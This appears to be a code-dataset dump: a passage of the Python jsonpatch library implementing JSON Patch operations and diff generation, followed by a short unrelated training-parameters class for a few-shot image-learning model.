class JsonPatchConflict(JsonPatchException):
"""Raised if patch could not be applied due to conflict situation such as:
- attempt to add object key when it already exists;
- attempt to operate with nonexistence object key;
- attempt to insert value to array at position beyond its size;
- etc.
"""
class JsonPatchTestFailed(JsonPatchException, AssertionError):
""" A Test operation failed """
def multidict(ordered_pairs):
"""Convert duplicate keys values to lists."""
# read all values into lists
mdict = collections.defaultdict(list)
for key, value in ordered_pairs:
mdict[key].append(value)
return dict(
# unpack lists that have only 1 item
(key, values[0] if len(values) == 1 else values)
for key, values in mdict.items()
)
# The "object_pairs_hook" parameter is used to handle duplicate keys when
# loading a JSON object.
_jsonloads = functools.partial(json.loads, object_pairs_hook=multidict)
def apply_patch(doc, patch, in_place=False):
"""Apply list of patches to specified json document.
:param doc: Document object.
:type doc: dict
:param patch: JSON patch as list of dicts or raw JSON-encoded string.
:type patch: list or str
:param in_place: While :const:`True` patch will modify target document.
By default patch will be applied to document copy.
:type in_place: bool
:return: Patched document object.
:rtype: dict
>>> doc = {'foo': 'bar'}
>>> patch = [{'op': 'add', 'path': '/baz', 'value': 'qux'}]
>>> other = apply_patch(doc, patch)
>>> doc is not other
True
>>> other == {'foo': 'bar', 'baz': 'qux'}
True
>>> patch = [{'op': 'add', 'path': '/baz', 'value': 'qux'}]
>>> apply_patch(doc, patch, in_place=True) == {'foo': 'bar', 'baz': 'qux'}
True
>>> doc == other
True
"""
if isinstance(patch, basestring):
patch = JsonPatch.from_string(patch)
else:
patch = JsonPatch(patch)
return patch.apply(doc, in_place)
def make_patch(src, dst):
"""Generates patch by comparing two document objects. Actually is
a proxy to :meth:`JsonPatch.from_diff` method.
:param src: Data source document object.
:type src: dict
:param dst: Data source document object.
:type dst: dict
>>> src = {'foo': 'bar', 'numbers': [1, 3, 4, 8]}
>>> dst = {'baz': 'qux', 'numbers': [1, 4, 7]}
>>> patch = make_patch(src, dst)
>>> new = patch.apply(src)
>>> new == dst
True
"""
return JsonPatch.from_diff(src, dst)
class JsonPatch(object):
"""A JSON Patch is a list of Patch Operations.
>>> patch = JsonPatch([
... {'op': 'add', 'path': '/foo', 'value': 'bar'},
... {'op': 'add', 'path': '/baz', 'value': [1, 2, 3]},
... {'op': 'remove', 'path': '/baz/1'},
... {'op': 'test', 'path': '/baz', 'value': [1, 3]},
... {'op': 'replace', 'path': '/baz/0', 'value': 42},
... {'op': 'remove', 'path': '/baz/1'},
... ])
>>> doc = {}
>>> result = patch.apply(doc)
>>> expected = {'foo': 'bar', 'baz': [42]}
>>> result == expected
True
JsonPatch object is iterable, so you can easily access each patch
statement in a loop:
>>> lpatch = list(patch)
>>> expected = {'op': 'add', 'path': '/foo', 'value': 'bar'}
>>> lpatch[0] == expected
True
>>> lpatch == patch.patch
True
Also JsonPatch could be converted directly to :class:`bool` if it contains
any operation statements:
>>> bool(patch)
True
>>> bool(JsonPatch([]))
False
This behavior is very handy with :func:`make_patch` to write more readable
code:
>>> old = {'foo': 'bar', 'numbers': [1, 3, 4, 8]}
>>> new = {'baz': 'qux', 'numbers': [1, 4, 7]}
>>> patch = make_patch(old, new)
>>> if patch:
... # document have changed, do something useful
... patch.apply(old) #doctest: +ELLIPSIS
{...}
"""
def __init__(self, patch):
self.patch = patch
self.operations = {
'remove': RemoveOperation,
'add': AddOperation,
'replace': ReplaceOperation,
'move': MoveOperation,
'test': TestOperation,
'copy': CopyOperation,
}
def __str__(self):
"""str(self) -> self.to_string()"""
return self.to_string()
def __bool__(self):
return bool(self.patch)
__nonzero__ = __bool__
def __iter__(self):
return iter(self.patch)
def __hash__(self):
return hash(tuple(self._ops))
def __eq__(self, other):
if not isinstance(other, JsonPatch):
return False
return self._ops == other._ops
def __ne__(self, other):
return not(self == other)
@classmethod
def from_string(cls, patch_str):
"""Creates JsonPatch instance from string source.
:param patch_str: JSON patch as raw string.
:type patch_str: str
:return: :class:`JsonPatch` instance.
"""
patch = _jsonloads(patch_str)
return cls(patch)
@classmethod
def from_diff(cls, src, dst, optimization=True):
"""Creates JsonPatch instance based on comparison of two document
objects. Json patch would be created for `src` argument against `dst`
one.
:param src: Data source document object.
:type src: dict
:param dst: Data source document object.
:type dst: dict
:return: :class:`JsonPatch` instance.
>>> src = {'foo': 'bar', 'numbers': [1, 3, 4, 8]}
>>> dst = {'baz': 'qux', 'numbers': [1, 4, 7]}
>>> patch = JsonPatch.from_diff(src, dst)
>>> new = patch.apply(src)
>>> new == dst
True
"""
builder = DiffBuilder()
builder._compare_values('', None, src, dst)
ops = list(builder.execute())
return cls(ops)
def to_string(self):
"""Returns patch set as JSON string."""
return json.dumps(self.patch)
@property
def _ops(self):
return tuple(map(self._get_operation, self.patch))
def apply(self, obj, in_place=False):
"""Applies the patch to a given object.
:param obj: Document object.
:type obj: dict
:param in_place: Tweaks the way how patch would be applied - directly to
specified `obj` or to its copy.
:type in_place: bool
:return: Modified `obj`.
"""
if not in_place:
obj = copy.deepcopy(obj)
for operation in self._ops:
obj = operation.apply(obj)
return obj
def _get_operation(self, operation):
if 'op' not in operation:
raise InvalidJsonPatch("Operation does not contain 'op' member")
op = operation['op']
if not isinstance(op, basestring):
raise InvalidJsonPatch("Operation must be a string")
if op not in self.operations:
raise InvalidJsonPatch("Unknown operation {0!r}".format(op))
cls = self.operations[op]
return cls(operation)
class PatchOperation(object):
"""A single operation inside a JSON Patch."""
def __init__(self, operation):
if not operation.__contains__('path'):
raise InvalidJsonPatch("Operation must have a 'path' member")
if isinstance(operation['path'], JsonPointer):
self.location = operation['path'].path
self.pointer = operation['path']
else:
self.location = operation['path']
try:
self.pointer = JsonPointer(self.location)
except TypeError as ex:
raise InvalidJsonPatch("Invalid 'path'")
self.operation = operation
def apply(self, obj):
"""Abstract method that applies a patch operation to the specified object."""
raise NotImplementedError('should implement the patch operation.')
def __hash__(self):
return hash(frozenset(self.operation.items()))
def __eq__(self, other):
if not isinstance(other, PatchOperation):
return False
return self.operation == other.operation
def __ne__(self, other):
return not(self == other)
@property
def path(self):
return '/'.join(self.pointer.parts[:-1])
@property
def key(self):
try:
return int(self.pointer.parts[-1])
except ValueError:
return self.pointer.parts[-1]
@key.setter
def key(self, value):
self.pointer.parts[-1] = str(value)
self.location = self.pointer.path
self.operation['path'] = self.location
class RemoveOperation(PatchOperation):
"""Removes an object property or an array element."""
def apply(self, obj):
subobj, part = self.pointer.to_last(obj)
try:
del subobj[part]
except (KeyError, IndexError) as ex:
msg = "can't remove a non-existent object '{0}'".format(part)
raise JsonPatchConflict(msg)
return obj
def _on_undo_remove(self, path, key):
if self.path == path:
if self.key >= key:
self.key += 1
else:
key -= 1
return key
def _on_undo_add(self, path, key):
if self.path == path:
if self.key > key:
self.key -= 1
else:
key -= 1
return key
class AddOperation(PatchOperation):
"""Adds an object property or an array element."""
def apply(self, obj):
try:
value = self.operation["value"]
except KeyError as ex:
raise InvalidJsonPatch(
"The operation does not contain a 'value' member")
subobj, part = self.pointer.to_last(obj)
if isinstance(subobj, MutableSequence):
if part == '-':
subobj.append(value) # pylint: disable=E1103
elif part > len(subobj) or part < 0:
raise JsonPatchConflict("can't insert outside of list")
else:
subobj.insert(part, value) # pylint: disable=E1103
elif isinstance(subobj, MutableMapping):
if part is None:
obj = value # we're replacing the root
else:
subobj[part] = value
else:
if part is None:
raise TypeError("invalid document type {0}".format(type(subobj)))
else:
raise JsonPatchConflict("unable to fully resolve json pointer {0}, part {1}".format(self.location, part))
return obj
def _on_undo_remove(self, path, key):
if self.path == path:
if self.key > key:
self.key += 1
else:
key += 1
return key
def _on_undo_add(self, path, key):
if self.path == path:
if self.key > key:
self.key -= 1
else:
key += 1
return key
class ReplaceOperation(PatchOperation):
"""Replaces an object property or an array element by a new value."""
def apply(self, obj):
try:
value = self.operation["value"]
except KeyError as ex:
raise InvalidJsonPatch(
"The operation does not contain a 'value' member")
subobj, part = self.pointer.to_last(obj)
if part is None:
return value
if part == "-":
raise InvalidJsonPatch("'path' with '-' can't be applied to 'replace' operation")
if isinstance(subobj, MutableSequence):
if part >= len(subobj) or part < 0:
raise JsonPatchConflict("can't replace outside of list")
elif isinstance(subobj, MutableMapping):
if part not in subobj:
msg = "can't replace a non-existent object '{0}'".format(part)
raise JsonPatchConflict(msg)
else:
if part is None:
raise TypeError("invalid document type {0}".format(type(subobj)))
else:
raise JsonPatchConflict("unable to fully resolve json pointer {0}, part {1}".format(self.location, part))
subobj[part] = value
return obj
def _on_undo_remove(self, path, key):
return key
def _on_undo_add(self, path, key):
return key
class MoveOperation(PatchOperation):
"""Moves an object property or an array element to a new location."""
def apply(self, obj):
try:
if isinstance(self.operation['from'], JsonPointer):
from_ptr = self.operation['from']
else:
from_ptr = JsonPointer(self.operation['from'])
except KeyError as ex:
raise InvalidJsonPatch(
"The operation does not contain a 'from' member")
subobj, part = from_ptr.to_last(obj)
try:
value = subobj[part]
except (KeyError, IndexError) as ex:
raise JsonPatchConflict(str(ex))
# If source and target are equal, this is a no-op
if self.pointer == from_ptr:
return obj
if isinstance(subobj, MutableMapping) and \
self.pointer.contains(from_ptr):
raise JsonPatchConflict('Cannot move values into their own children')
obj = RemoveOperation({
'op': 'remove',
'path': self.operation['from']
}).apply(obj)
obj = AddOperation({
'op': 'add',
'path': self.location,
'value': value
}).apply(obj)
return obj
@property
def from_path(self):
from_ptr = JsonPointer(self.operation['from'])
return '/'.join(from_ptr.parts[:-1])
@property
def from_key(self):
from_ptr = JsonPointer(self.operation['from'])
try:
return int(from_ptr.parts[-1])
except TypeError:
return from_ptr.parts[-1]
@from_key.setter
def from_key(self, value):
from_ptr = JsonPointer(self.operation['from'])
from_ptr.parts[-1] = str(value)
self.operation['from'] = from_ptr.path
def _on_undo_remove(self, path, key):
if self.from_path == path:
if self.from_key >= key:
self.from_key += 1
else:
key -= 1
if self.path == path:
if self.key > key:
self.key += 1
else:
key += 1
return key
def _on_undo_add(self, path, key):
if self.from_path == path:
if self.from_key > key:
self.from_key -= 1
else:
key -= 1
if self.path == path:
if self.key > key:
self.key -= 1
else:
key += 1
return key
class TestOperation(PatchOperation):
"""Test value by specified location."""
def apply(self, obj):
try:
subobj, part = self.pointer.to_last(obj)
if part is None:
val = subobj
else:
val = self.pointer.walk(subobj, part)
except JsonPointerException as ex:
raise JsonPatchTestFailed(str(ex))
try:
value = self.operation['value']
except KeyError as ex:
raise InvalidJsonPatch(
"The operation does not contain a 'value' member")
if val != value:
msg = '{0} ({1}) is not equal to tested value {2} ({3})'
raise JsonPatchTestFailed(msg.format(val, type(val),
value, type(value)))
return obj
class CopyOperation(PatchOperation):
""" Copies an object property or an array element to a new location """
def apply(self, obj):
try:
from_ptr = JsonPointer(self.operation['from'])
except KeyError as ex:
raise InvalidJsonPatch(
"The operation does not contain a 'from' member")
subobj, part = from_ptr.to_last(obj)
try:
value = copy.deepcopy(subobj[part])
except (KeyError, IndexError) as ex:
raise JsonPatchConflict(str(ex))
obj = AddOperation({
'op': 'add',
'path': self.location,
'value': value
}).apply(obj)
return obj
class DiffBuilder(object):
def __init__(self):
self.index_storage = [{}, {}]
self.index_storage2 = [[], []]
self.__root = root = []
root[:] = [root, root, None]
def store_index(self, value, index, st):
try:
storage = self.index_storage[st]
stored = storage.get(value)
if stored is None:
storage[value] = [index]
else:
storage[value].append(index)
except TypeError:
self.index_storage2[st].append((value, index))
def take_index(self, value, st):
try:
stored = self.index_storage[st].get(value)
if stored:
return stored.pop()
except TypeError:
storage = self.index_storage2[st]
for i in range(len(storage)-1, -1, -1):
if storage[i][0] == value:
return storage.pop(i)[1]
def insert(self, op):
root = self.__root
last = root[0]
last[1] = root[0] = [last, root, op]
return root[0]
def remove(self, index):
link_prev, link_next, _ = index
link_prev[1] = link_next
link_next[0] = link_prev
index[:] = []
def iter_from(self, start):
root = self.__root
curr = start[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __iter__(self):
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def execute(self):
root = self.__root
curr = root[1]
while curr is not root:
if curr[1] is not root:
op_first, op_second = curr[2], curr[1][2]
if op_first.location == op_second.location and \
type(op_first) == RemoveOperation and \
type(op_second) == AddOperation:
yield ReplaceOperation({
'op': 'replace',
'path': op_second.location,
'value': op_second.operation['value'],
}).operation
curr = curr[1][1]
continue
yield curr[2].operation
curr = curr[1]
def _item_added(self, path, key, item):
index = self.take_index(item, _ST_REMOVE)
if index is not None:
op = index[2]
if type(op.key) == int and type(key) == int:
for v in self.iter_from(index):
op.key = v._on_undo_remove(op.path, op.key)
self.remove(index)
if op.location != _path_join(path, key):
new_op = MoveOperation({
'op': 'move',
'from': op.location,
'path': _path_join(path, key),
})
self.insert(new_op)
else:
new_op = AddOperation({
'op': 'add',
'path': _path_join(path, key),
'value': item,
})
new_index = self.insert(new_op)
self.store_index(item, new_index, _ST_ADD)
def _item_removed(self, path, key, item):
new_op = RemoveOperation({
'op': 'remove',
'path': _path_join(path, key),
})
index = self.take_index(item, _ST_ADD)
new_index = self.insert(new_op)
if index is not None:
op = index[2]
if type(op.key) == int:
for v in self.iter_from(index):
op.key = v._on_undo_add(op.path, op.key)
self.remove(index)
if new_op.location != op.location:
new_op = MoveOperation({
'op': 'move',
'from': new_op.location,
'path': op.location,
})
new_index[2] = new_op
else:
self.remove(new_index)
else:
self.store_index(item, new_index, _ST_REMOVE)
def _item_replaced(self, path, key, item):
self.insert(ReplaceOperation({
'op': 'replace',
'path': _path_join(path, key),
'value': item,
}))
def _compare_dicts(self, path, src, dst):
src_keys = set(src.keys())
dst_keys = set(dst.keys())
added_keys = dst_keys - src_keys
removed_keys = src_keys - dst_keys
for key in removed_keys:
self._item_removed(path, str(key), src[key])
for key in added_keys:
self._item_added(path, str(key), dst[key])
for key in src_keys & dst_keys:
self._compare_values(path, key, src[key], dst[key])
def _compare_lists(self, path, src, dst):
len_src, len_dst = len(src), len(dst)
max_len = max(len_src, len_dst)
min_len = min(len_src, len_dst)
for key in range(max_len):
if key < min_len:
old, new = src[key], dst[key]
if old == new:
continue
elif isinstance(old, MutableMapping) and \
isinstance(new, MutableMapping):
self._compare_dicts(_path_join(path, key), old, new)
elif isinstance(old, MutableSequence) and \
isinstance(new, MutableSequence):
self._compare_lists(_path_join(path, key), old, new)
else:
self._item_removed(path, key, old)
self._item_added(path, key, new)
elif len_src > len_dst:
self._item_removed(path, len_dst, src[key])
else:
self._item_added(path, key, dst[key])
def _compare_values(self, path, key, src, dst):
if isinstance(src, MutableMapping) and \
isinstance(dst, MutableMapping):
self._compare_dicts(_path_join(path, key), src, dst)
elif isinstance(src, MutableSequence) and \
isinstance(dst, MutableSequence):
self._compare_lists(_path_join(path, key), src, dst)
# To ensure we catch changes to JSON, we can't rely on a simple
# src == dst, because it would not recognize the difference between
# 1 and True, among other things. Using json.dumps is the most
# fool-proof way to ensure we catch type changes that matter to JSON
# and ignore those that don't. The performance of this could be
# improved by doing more direct type checks, but we'd need to be
# careful to accept type changes that don't matter when JSONified.
elif json.dumps(src) == json.dumps(dst):
return
else:
self._item_replaced(path, key, dst)
def _path_join(path, key):
if key is None:
return path
return path + '/' + str(key).replace('~', '~0').replace('/', '~1')
| python |
import argparse
import os
class Parameters():
def __init__(self):###
# Training settings
self.LR=0.001
self.clsLR=0.001
self.batch_size=30
self.nthreads=8
self.tensorname='IDeMNet'
self.ways=5
self.shots=5
self.test_num=15
self.augnum=5
self.data='miniImageEmbedding'
self.network='None'
self.gallery_img=30
self.stepSize=10
self.patch_size=3
self.epoch=600
self.trainways=5
self.fixScale=0
self.GNet='none'
self.train_from_scratch=True
self.fix_deform=True
self.fix_emb=True
self.chooseNum=15 | python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.